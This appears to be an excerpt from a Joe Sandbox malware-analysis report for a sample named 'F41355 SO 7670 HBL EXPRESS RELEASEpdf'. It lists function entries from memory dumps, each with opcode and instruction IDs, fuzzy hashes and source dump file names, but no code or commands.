Instruction ID: 0c9fb2e792a069bfc0b169d514ec23c3c9b4987746b881941021300776f76cf9
Opcode Fuzzy Hash: 56b603a6b504a3c5b54a161b545c99f0ac09696ad5532f52278e7dfb6698e651
Instruction Fuzzy Hash: 4001C475D01219AFCB40EFA8C9459DEBFF4EF49210F1086AAE858E7321E7709A54CB91

Function 04F91E20 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a0c44caf2238e7f0ea2e14ac18e830917e4c408a25d68b10a574e5d6a41c5ca
Instruction ID: 09158545f5a8d0278801f955dd7b8725fe6f9f4c64ffe349aa1aec2b2cd3af98
Opcode Fuzzy Hash: 7a0c44caf2238e7f0ea2e14ac18e830917e4c408a25d68b10a574e5d6a41c5ca
Instruction Fuzzy Hash: 22012171D0020ADFFF14DF5AC54479EBEF5BB48310F24C129E9285B290C7709945CB94

Function 04F90B00 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 194a1d288f2e4927767adf8ad0a822ee85ea61f7b55333928cd4761b4c12e580
Instruction ID: e7cb866b317c96d984465f9777a8b0c3b632ef7b894e5d9d4374d882de248380
Opcode Fuzzy Hash: 194a1d288f2e4927767adf8ad0a822ee85ea61f7b55333928cd4761b4c12e580
Instruction Fuzzy Hash: 020184347407448FE715AB78D0587AB7AD2AB85704F00486ED05B8B3C1CFB95849CB62

Function 04F97964 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7ec3d25e595998e395d905f84a3b3f1fb7e4a294298205c70cbb9302e26f9ab
Instruction ID: 8e303e37e62763ed25f338937ca196f37ebf9b15101b8668253b2a3c80db52ab
Opcode Fuzzy Hash: f7ec3d25e595998e395d905f84a3b3f1fb7e4a294298205c70cbb9302e26f9ab
Instruction Fuzzy Hash: AAF0B4363142118BFF289A2B8C40F7A73E99FC5755B06046DA50AC7360EEA0FC07D691

Function 06B63680 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9ea88ac6b6209cce2ab0d2adf7ace243adae2914b32085c178ab1aec29dcd9c
Instruction ID: 52ed1de233cb814f523f739e0b34e74cfbf02aa40a31e7cef5145de188ae6472
Opcode Fuzzy Hash: a9ea88ac6b6209cce2ab0d2adf7ace243adae2914b32085c178ab1aec29dcd9c
Instruction Fuzzy Hash: 4B013131A1062D8BCF05EBA9DC148DDB7B5FF89310F018525DA1677250EF746A198BE1

Function 06B64649 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33177e75368a31bfe9b73ddea107865009d38f787e328647566cc5424634019c
Instruction ID: 597d69f60baca401a97e22b00a5e659ffe975d032024ade446a55334b4b2e77e
Opcode Fuzzy Hash: 33177e75368a31bfe9b73ddea107865009d38f787e328647566cc5424634019c
Instruction Fuzzy Hash: 11F0967A3442045FC364AF6AE404A567B95EBD5760F05807EF695CB281C935D806C760

Function 04F9B5F0 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac6eb32e31ad12019f2a277eb3dd3b51af39a7b5efdc63eb86bd53ffd48eee99
Instruction ID: 37003476daa6463d3e31070813d341937c08e9e236cede48cb9214a20b229919
Opcode Fuzzy Hash: ac6eb32e31ad12019f2a277eb3dd3b51af39a7b5efdc63eb86bd53ffd48eee99
Instruction Fuzzy Hash: 4AF0C2367006008FCB159B1AE884A6BBBBAEFC9724F10056AE50687332DF35FC02C790

Function 06B6E43F Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7284ffc1a3a67d49e82a0cc0f2684e39910957b17b8faa732a18b540bb16bcf2
Instruction ID: 0461765016df84209b14d3256209f4fecee04b7d6490d4b908a1815a1d527a45
Opcode Fuzzy Hash: 7284ffc1a3a67d49e82a0cc0f2684e39910957b17b8faa732a18b540bb16bcf2
Instruction Fuzzy Hash: B31161BC940265CFDB54EFA4D904B997B76FB84200F1042D6D90AB7744DB309D82CF60

Function 06B6BC8C Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec5fe6dce31bad8c17d0b01d4ce79d6fd12235bdde126e124769c98fa47ab180
Instruction ID: b6ad479864912feff26fc2339fe6c1cf43a3b8749c9749f2bbd55fb937d711d6
Opcode Fuzzy Hash: ec5fe6dce31bad8c17d0b01d4ce79d6fd12235bdde126e124769c98fa47ab180
Instruction Fuzzy Hash: 770148B8509214CFD764CB21C554AB87BB6FF0A312F1041D9E04E6B392CB3A9D86CF50

Function 06B6D948 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b02ef6a8e090aaabb9f14aa16afe8cc50660ee390320490d70550b4edd1c7ff8
Instruction ID: b1a6956eced513e57a6a6ce597c9376bd6718653bd70b310377dd348a99e1d01
Opcode Fuzzy Hash: b02ef6a8e090aaabb9f14aa16afe8cc50660ee390320490d70550b4edd1c7ff8
Instruction Fuzzy Hash: 5C01E5B8D002599FCB50DFA8C540AAEFBF5BF08301F1481A6E954E7341D334AA40CBA1

Function 04F9B580 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53e7ec916e5af40b918a10b6e88e7637ac3eac6fc53c176dbce58e7827449494
Instruction ID: f00945ab00670f1252dcab41bd6bb784c8021ecc57fff880ea8d8f70216153ab
Opcode Fuzzy Hash: 53e7ec916e5af40b918a10b6e88e7637ac3eac6fc53c176dbce58e7827449494
Instruction Fuzzy Hash: 13F0AF31A007048BEF12BA7498008EEB7B5AFC1315F05496ED88957340EF30B942CAD2

Function 04F9B988 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f18ab0b6c02b513c21f571459d22cb47c12f09eb056efabd67159a67aa634374
Instruction ID: d5475bfcc9f64af2c9412cd1cce7aa1b9e60fb76092bce1522c4c9ece4586fca
Opcode Fuzzy Hash: f18ab0b6c02b513c21f571459d22cb47c12f09eb056efabd67159a67aa634374
Instruction Fuzzy Hash: E5F054367046155FD7149A6AF88485EBBEAFFC4625310457AF10EC7621DE61EC098790

Function 00A7D744 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2085741447.0000000000A7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A7D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a7d000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b43b91b4a1df5864fd44a641c2a53404486ec28190f1d07f680728066399060
Instruction ID: d8936d2209d5d1dc9cf8f12f2152fff96313bf44bfe992a62333410325205731
Opcode Fuzzy Hash: 0b43b91b4a1df5864fd44a641c2a53404486ec28190f1d07f680728066399060
Instruction Fuzzy Hash: 61F06D71404344AEE7248F1ACD88B63FFA8EF96734F18C45AED4C4E286C2799C44CAB1

Function 06B6C670 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5dc7de5a1249fea0e2ae7e795b645d0bf5d8b8aedab4c58a8214e4c84bed09d
Instruction ID: fd5808f461de121fef899c8ee3d1f9e2e127a04e10056b59167d939fba078dfe
Opcode Fuzzy Hash: e5dc7de5a1249fea0e2ae7e795b645d0bf5d8b8aedab4c58a8214e4c84bed09d
Instruction Fuzzy Hash: D1F044B090C108CFE784CB9BC0444B9FBBABB4E301750E1E5E4AA97212CB38A541CF84

Function 04F92160 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46dd13e0eb4a894dfc31a4f5ca30996f0e99f668048ae1b61b58d8f6675064b5
Instruction ID: 796ef3d2ccee9020f6eef4f3a2c9dd04d38ae5679ae8e7235673b58766b7896c
Opcode Fuzzy Hash: 46dd13e0eb4a894dfc31a4f5ca30996f0e99f668048ae1b61b58d8f6675064b5
Instruction Fuzzy Hash: 3FF0E9727042541F9304CB6ADC94C6BBFE9FFCD66031580B6E508C7312DA308C01C3A0

Function 04F998E8 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01ee5017da666298623beef7e3d50e584c1d0070eb3a308e4f7d49fa3b195a26
Instruction ID: ac12f531ee6fe28a3235c17ade2cec41538944e4cd9882a50e56b005f70e880f
Opcode Fuzzy Hash: 01ee5017da666298623beef7e3d50e584c1d0070eb3a308e4f7d49fa3b195a26
Instruction Fuzzy Hash: 3BF05E3171072087BF29BA3A9824A3D76EA9FC9A24B15406DD409CB3A0DE65ED03C295

Function 04F9B978 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 071ed1e0dc91bcd1296a9e37a22a9f6ae988bd2f95e22c787d683c066d8c29d9
Instruction ID: 0a9c1dccd82c57e6e6b754dbf365effb8cf10abc5c7d0a030c4647477da05e47
Opcode Fuzzy Hash: 071ed1e0dc91bcd1296a9e37a22a9f6ae988bd2f95e22c787d683c066d8c29d9
Instruction Fuzzy Hash: F9F0E2323002012FCA046A69F8C5E6E7FEAEF84321B400539F10ADB722DE60ED0A8380

Function 06B636F0 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52bf493ee684d86f1874e2ada850a188080031488aa664c75e510e60a0824249
Instruction ID: 32b5dcafcb96d5d6032d814cb9e56a8b09e0fb4d332f00ab5265a13a02dd7488
Opcode Fuzzy Hash: 52bf493ee684d86f1874e2ada850a188080031488aa664c75e510e60a0824249
Instruction Fuzzy Hash: 26F0B471E093419FCB15AB2EA98086EBBA9EEC6211714057FE505C7251DB70D845C361

Function 04F920D0 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fdef8b0c9cc56506faa59e3c5858480da318a629595240480f08a26a10f55a50
Instruction ID: c9ea9ba95fc8c3f116fec9b71b5a031dd774efd38cb398209971a2aabbf721f1
Opcode Fuzzy Hash: fdef8b0c9cc56506faa59e3c5858480da318a629595240480f08a26a10f55a50
Instruction Fuzzy Hash: 5701FB70C04219EFEF14DFAAC4443EEBAF1BF49350F118665E424AA2A0D7745A85CF90

Function 04F99288 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e26b3b693c3fa3a092213b46d9974f97095fdf38ae2968b16eb170a88f8efb51
Instruction ID: 4243ceffdd30f352615e2fe6667d750750fc4abca0ae9b7f9b7c733986b7bd1f
Opcode Fuzzy Hash: e26b3b693c3fa3a092213b46d9974f97095fdf38ae2968b16eb170a88f8efb51
Instruction Fuzzy Hash: 0601B675D00609DFCB40EFACC54589DBBF4FF49210B1185AAE859EB321E770AA44CF91

Function 04F92170 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48a587914505f5309fc85b617366cbecf5028f08d949d5ced8c51d013b23c493
Instruction ID: b4ce79fbb0bd9f0b9dd2b586b940026f2bd34098f138e777dc0a2b31f50e21b9
Opcode Fuzzy Hash: 48a587914505f5309fc85b617366cbecf5028f08d949d5ced8c51d013b23c493
Instruction Fuzzy Hash: E5E039727001286F93049AAEDC84C6BBBEDEBCC660361807AF508C7311DA319C0186A0

Function 04F96F91 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 506009cd75ce42f076e4d93ed859c9acf8a2ad63599a94d968a0f2a7e87c28da
Instruction ID: a7f4587e6c95acf93fe4d8580df4af9c763a6e62eb388a7f1892e0b41405c3ee
Opcode Fuzzy Hash: 506009cd75ce42f076e4d93ed859c9acf8a2ad63599a94d968a0f2a7e87c28da
Instruction Fuzzy Hash: B5F030323500149FC714DF2DD894E5577E9EF89B21B1640B9F109CB372DA61EC01CB90

Function 04F957DC Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 208c2be028cf770f7c130cf87ad40ab6cfeca432466cd06d894f57c896c0a4b0
Instruction ID: e8938858b5d8fd33a78e33624171fb5a6e9c061a60216359a69f5caf501a803a
Opcode Fuzzy Hash: 208c2be028cf770f7c130cf87ad40ab6cfeca432466cd06d894f57c896c0a4b0
Instruction Fuzzy Hash: 02F02B63A0E3D46FE71347789CA17113FE4DB13640B4D00EBD445C7663E509AA02C366

Function 04F9B9E0 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0c3b340c715cc74f54473af9bee43709019d29a34473532507a947fe93b0bcd
Instruction ID: 6da74035c851419c0e241838e49ed11c2fb322bcf261dc72782cdb40cd3f0276
Opcode Fuzzy Hash: d0c3b340c715cc74f54473af9bee43709019d29a34473532507a947fe93b0bcd
Instruction Fuzzy Hash: 24F01275201600CFC718DF28E689E587BE2FF09B19B1649A9E00ACB372CB36EC41CB00

Function 04F99949 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4edf3d3e66732e3d598447495b114c4278591a9f8918f93a1207b230fb969dcc
Instruction ID: 4c6adc0217a96eb7a0dff4a5cac7c4c6ce52f831d73f05263d44321d7aa97d4d
Opcode Fuzzy Hash: 4edf3d3e66732e3d598447495b114c4278591a9f8918f93a1207b230fb969dcc
Instruction Fuzzy Hash: 76E0923A3041004FEF149925CC41BBC37E1DF8135AF4941BDE005CB7A0D22EDE46D601

Function 06B6AD4D Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce5fb2a3230009d55e0bd91ebe3bc61d03836a791fce0798e7b66a6e726df8d1
Instruction ID: ccb8cb6634e2eb149a77f3eaef94c6ebb95e94d6c6a305c1724d8acf18770065
Opcode Fuzzy Hash: ce5fb2a3230009d55e0bd91ebe3bc61d03836a791fce0798e7b66a6e726df8d1
Instruction Fuzzy Hash: B7F0E7B4D0874C8FCF40DFE5C9649DDBBB6BF49300B108069E41AAB35ADA345806CB41

Function 04F9B9F0 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c65a05d23b07d02d16ab8b82ef16c9fd435cf0bec320db68925a07f8b12a117
Instruction ID: 8f5755d20fc5a384297b2894547314331213b17121a749e749a3e153319203ea
Opcode Fuzzy Hash: 1c65a05d23b07d02d16ab8b82ef16c9fd435cf0bec320db68925a07f8b12a117
Instruction Fuzzy Hash: A9F0DF34250610CFC718DB2CE588C597BEAFF4AB1971149A9E50ACB332DB72EC44CB80

Function 06B6E7B1 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2770419c6d25dae05908bc4eed470c2279535480eca964aa3b95fae2fa27c9eb
Instruction ID: 6f208b992bfa5f382ee2199d529022f858dd8cff6238dc4b78eaa36e0c301c26
Opcode Fuzzy Hash: 2770419c6d25dae05908bc4eed470c2279535480eca964aa3b95fae2fa27c9eb
Instruction Fuzzy Hash: 3DF05EB880A205CFD750EF6CD44895DBBF6FF06311B4490A9F4099B666D338E942CF80

Function 06B6C5E5 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1beab062b942fd1cd6146a78f62189195df1114c42a7146972dc6fe3ef20c715
Instruction ID: a55f3991402a0e5738212f5c4653034ffe66dfdda35be908d9349b124e0e8a03
Opcode Fuzzy Hash: 1beab062b942fd1cd6146a78f62189195df1114c42a7146972dc6fe3ef20c715
Instruction Fuzzy Hash: D3E039F4A0C2489FEBD4CA9384144BA7FBAAB8A200700E5A1B09A46122D73C85068F98

Function 06B6C951 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b83adcc882d2a399c8b63e774cf761637fb75348d4da4ae64f54bc30a5e0b06
Instruction ID: eafd4135432e0142ee4bf2c60a0d4674f97a8549313cc73b8fddbaf93b064606
Opcode Fuzzy Hash: 0b83adcc882d2a399c8b63e774cf761637fb75348d4da4ae64f54bc30a5e0b06
Instruction Fuzzy Hash: EDF02BB8806344AFC312CB74E8146DE7F74AB03205F1040D9F94457242D6344A55DFB1

Function 04F96FA0 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab9667396a62f5ec7388eac8ad916d32927dae2263cf5ad9d22d4e997f3e3306
Instruction ID: fd3ed8c065f2d31e277d4449bc1fa16114dfafbeee58919fbd814f588c11ee5a
Opcode Fuzzy Hash: ab9667396a62f5ec7388eac8ad916d32927dae2263cf5ad9d22d4e997f3e3306
Instruction Fuzzy Hash: C1E0E5353604148FCB14DB2ED848D55B7E9EF89A2571640BAF209CB372DA61EC02CB90

Function 06B6FA11 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac39f609a2d4a2f4f986d816bab1eb9316b7be8958a04b849f2114c89d6ff608
Instruction ID: d5ff5ac38831cb26f9ee628d8a1932e38ecc231d7a6a4c75d58939344a85c976
Opcode Fuzzy Hash: ac39f609a2d4a2f4f986d816bab1eb9316b7be8958a04b849f2114c89d6ff608
Instruction Fuzzy Hash: CDF0E9B6D043489FCB66DF78C8446DCBFB1EF46320F0081DAD9549B391C2355A01DB41

Function 06B6CC67 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e932ea3138e1ed9d38cbf1ad30a22605a43c26244d71592bd0930edb5a47a12b
Instruction ID: 677a3ae7128ba49623ffb21b39e1624298fc2714695df0d0d30777fbed0f89ba
Opcode Fuzzy Hash: e932ea3138e1ed9d38cbf1ad30a22605a43c26244d71592bd0930edb5a47a12b
Instruction Fuzzy Hash: 25F015B1D002099FDBA0DFB9C959BDEBFF1AF08200F2185A9D455E7311E774450A8F90

Function 04F998A0 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9df70170cf7a8ed8562695499761ea436563d7fd2eef7827b24fcf2ef325845
Instruction ID: a1db2e359ded02736540dae21742a4e13f321ed459da473fa144dd26ba213bc0
Opcode Fuzzy Hash: f9df70170cf7a8ed8562695499761ea436563d7fd2eef7827b24fcf2ef325845
Instruction Fuzzy Hash: C9E08C393027046FC728DA1CE840F86B7EADF48710B584679F259D3760DAA5FD0A8B84

Function 06B6FA20 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2089302051.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b60000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c303ad6bfde5797056f8c9c36d551959c0255b8ce0edefc4cb4f1a676349111
Instruction ID: 20d0d0681b45956ea22c03b5409bdef40075e368bb3cf7e8cd7378e56e42a8e1
Opcode Fuzzy Hash: 9c303ad6bfde5797056f8c9c36d551959c0255b8ce0edefc4cb4f1a676349111
Instruction Fuzzy Hash: 9FF039B6E0020CEFCB54EFA9D94869DBBB6FB48301F00C0A9E918A3340D6745A50EF41

Function 04F97634 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088795163.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f90000_F41355 SO 7670 HBL EXPRESS RELEASEpdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd3936ad1e6dcfff2a07a9f9c5aa3cd0249667997176c0bee45c145d93d8ae7a
Instruction ID: 7673dea75c15c954a2122d61d02535c6ac85cf0904633745c8de111b275f12cd
Opcode Fuzzy Hash: fd3936ad1e6dcfff2a07a9f9c5aa3cd0249667997176c0bee45c145d93d8ae7a
Instruction Fuzzy Hash: BDE08C303506049F8728DA1CE880C6AB7EEEF88310355897DF10AC3364DAA0FC098B84

